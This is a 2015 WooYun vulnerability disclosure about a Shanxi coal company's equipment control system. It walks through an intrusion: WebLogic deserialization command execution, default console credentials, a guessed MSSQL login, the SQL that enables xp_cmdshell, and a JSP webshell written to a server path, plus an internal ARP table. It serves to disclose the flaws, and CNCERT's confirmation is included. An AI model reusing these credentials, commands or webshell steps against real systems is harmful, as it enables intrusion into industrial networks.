当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164442

漏洞标题:山西阳煤太化中控设备系统存在多个安全漏洞导致Getshell、内网大量主机

相关厂商:山西阳泉煤业(集团)有限责任公司

漏洞作者: 路人甲

提交时间:2015-12-25 13:32

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:命令执行

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-25: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-28: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

rt/求高rank、圣诞节没妹子陪伴、只有在乌云刷刷成就感!!

详细说明:

欢迎访问阳煤集团网站
http://**.**.**.**/

1.png


阳煤太化设备系统
**.**.**.**:7001/login.jsp

2.png


该目标存在 WebLogic “Java 反序列化”过程远程命令执行漏洞
**.**.**.**

3.png


win-lcrtkmqu84t\administrator

4.png


内网大量主机

接口: **.**.**.** --- 0xa
  Internet 地址         物理地址              类型
  **.**.**.**          68-f7-28-42-6c-57     动态        
  **.**.**.**          b0-83-fe-94-91-34     动态        
  **.**.**.**          a4-db-30-9f-9a-a6     动态        
  **.**.**.**         e8-2a-ea-6c-3a-2c     动态        
  **.**.**.**         a4-db-30-9f-b6-66     动态        
  **.**.**.**         d4-be-d9-dc-56-b3     动态        
  **.**.**.**         10-a5-d0-05-b9-ca     动态        
  **.**.**.**         a4-1f-72-86-33-0e     动态        
  **.**.**.**         d0-df-9a-39-ed-aa     动态        
  **.**.**.**         3c-97-0e-cd-ad-ca     动态        
  **.**.**.**         68-f7-28-af-4c-4d     动态        
  **.**.**.**         14-fe-b5-e8-2a-a5     动态        
  **.**.**.**         68-f7-28-af-49-e8     动态        
  **.**.**.**         20-a9-9b-ef-8f-c0     动态        
  **.**.**.**         80-56-f2-db-2f-6b     动态        
  **.**.**.**         9c-4e-36-bc-94-e0     动态        
  **.**.**.**         c0-ee-fb-06-60-85     动态        
  **.**.**.**         00-21-cc-6d-cf-c4     动态        
  **.**.**.**         d0-df-9a-39-ed-ab     动态        
  **.**.**.**         00-15-f2-6a-44-9d     动态        
  **.**.**.**         3c-97-0e-17-8d-22     动态        
  **.**.**.**0         3c-77-e6-92-26-7d     动态        
  **.**.**.**3         c8-1f-66-03-4b-25     动态        
  **.**.**.**0         3c-97-0e-cd-ae-e8     动态        
  **.**.**.**1         80-56-f2-db-40-2b     动态        
  **.**.**.**4         3c-97-0e-cd-a5-c2     动态        
  **.**.**.**        88-44-f6-05-b3-d0     动态        
  **.**.**.**        80-56-f2-db-40-2b     动态        
  **.**.**.**        78-92-9c-90-53-f0     动态        
  **.**.**.**6        60-57-18-d7-e0-42     动态        
  **.**.**.**9        78-45-c4-35-84-9e     动态        
  **.**.**.**        bc-30-5b-bf-fa-78     动态        
  **.**.**.**        a4-1f-72-50-b7-94     动态        
  **.**.**.**        b8-ac-6f-4e-1c-c3     动态        
  **.**.**.**9        d4-be-d9-db-7c-aa     动态        
  **.**.**.**3        d4-be-d9-dc-a8-b2     动态        
  **.**.**.**9        c8-1f-66-15-47-9f     动态        
  **.**.**.**1        34-02-86-0d-ca-91     动态        
  **.**.**.**2        34-02-86-0d-ca-91     动态        
  **.**.**.**3        1c-65-9d-fd-25-1f     动态        
  **.**.**.**4        1c-65-9d-fd-25-1f     动态        
  **.**.**.**5        3c-77-e6-92-26-7d     动态        
  **.**.**.**6        34-02-86-0d-ca-91     动态        
  **.**.**.**7        60-57-18-d7-e0-42     动态        
  **.**.**.**8        1c-65-9d-fd-25-1f     动态        
  **.**.**.**9        34-02-86-0d-ca-91     动态        
  **.**.**.**0        d0-df-9a-39-ed-ac     动态        
  **.**.**.**1        1c-65-9d-fd-25-1f     动态        
  **.**.**.**2        1c-65-9d-fd-25-1f     动态        
  **.**.**.**3        60-57-18-d7-e0-42     动态        
  **.**.**.**4        38-59-f9-e6-4e-a5     动态        
  **.**.**.**5        10-a5-d0-05-b9-ca     动态        
  **.**.**.**6        88-9f-fa-fd-b4-ea     动态        
  **.**.**.**7        a4-db-30-9f-b6-ad     动态        
  **.**.**.**8        88-9f-fa-fd-b4-ea     动态        
  **.**.**.**9        74-e5-43-16-68-89     动态        
  **.**.**.**        e8-2a-ea-6c-3a-2c     动态        
  **.**.**.**        e8-2a-ea-6c-3a-2c     动态        
  **.**.**.**        60-57-18-d7-e0-bf     动态        
  **.**.**.**        20-a9-9b-ef-8f-c0     动态        
  **.**.**.**        74-04-2b-46-14-3f     动态        
  **.**.**.**        74-04-2b-4d-58-dd     动态        
  **.**.**.**        e8-2a-ea-6c-3a-2c     动态        
  **.**.**.**        08-ed-b9-72-0a-4a     动态        
  **.**.**.**        a4-db-30-9f-b6-ad     动态        
  **.**.**.**        74-04-2b-4d-58-dd     动态        
  **.**.**.**1        ec-55-f9-c0-cf-23     动态        
  **.**.**.**2        74-04-2b-4d-58-dd     动态        
  **.**.**.**3        88-9f-fa-fd-b4-ea     动态        
  **.**.**.**5        1c-65-9d-fd-25-1f     动态        
  **.**.**.**        74-25-8a-c7-78-80     动态        
  **.**.**.**        ff-ff-ff-ff-ff-ff     静态


5.png


下面进入weblogic弱口令
**.**.**.**:7001/console
weblogic/weblogic123

6.png


mssql数据库
user=zgadmin
portNumber=1433
databaseName=dbtestme
serverName=**.**.**.**

7.png


密码我一猜与用户名一样。 拿到这个貌似是等于sa权限。
jdbc:weblogic:sqlserver://**.**.**.**:1433
zgadmin zgadmin

8.png


登录SQL分析器启用xp_cmdshell组件
sp_configure 'show advanced options',1
reconfigure
go
sp_configure
'xp_cmdshell',1
reconfigure
go

9.png


执行net user
不知其中用户是不是管理员自己建的、

\\ 的用户帐户
 
 -------------------------------------------------------------------------------
 Administrator            bhbxa0                   ghtca1                   
 Guest                    nbbxs1                   
 命令运行完毕,但发生一个或多个错误。


10.png


下面回到weblogic getshell
利用路径写马、
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_user\rr\ni4lm4\war

11.png


**.**.**.**:7001/rr/one9.jsp
小马、

12.png


我也不传大马了、就这样吧!证明即可、

漏洞证明:

**.**.**.**:7001/rr/wooyun.txt

13.png

修复方案:

更改弱口令和java反序列BUG

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-29 17:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.同时发山西分中心处置。

最新状态:

暂无

漏洞评价:

评价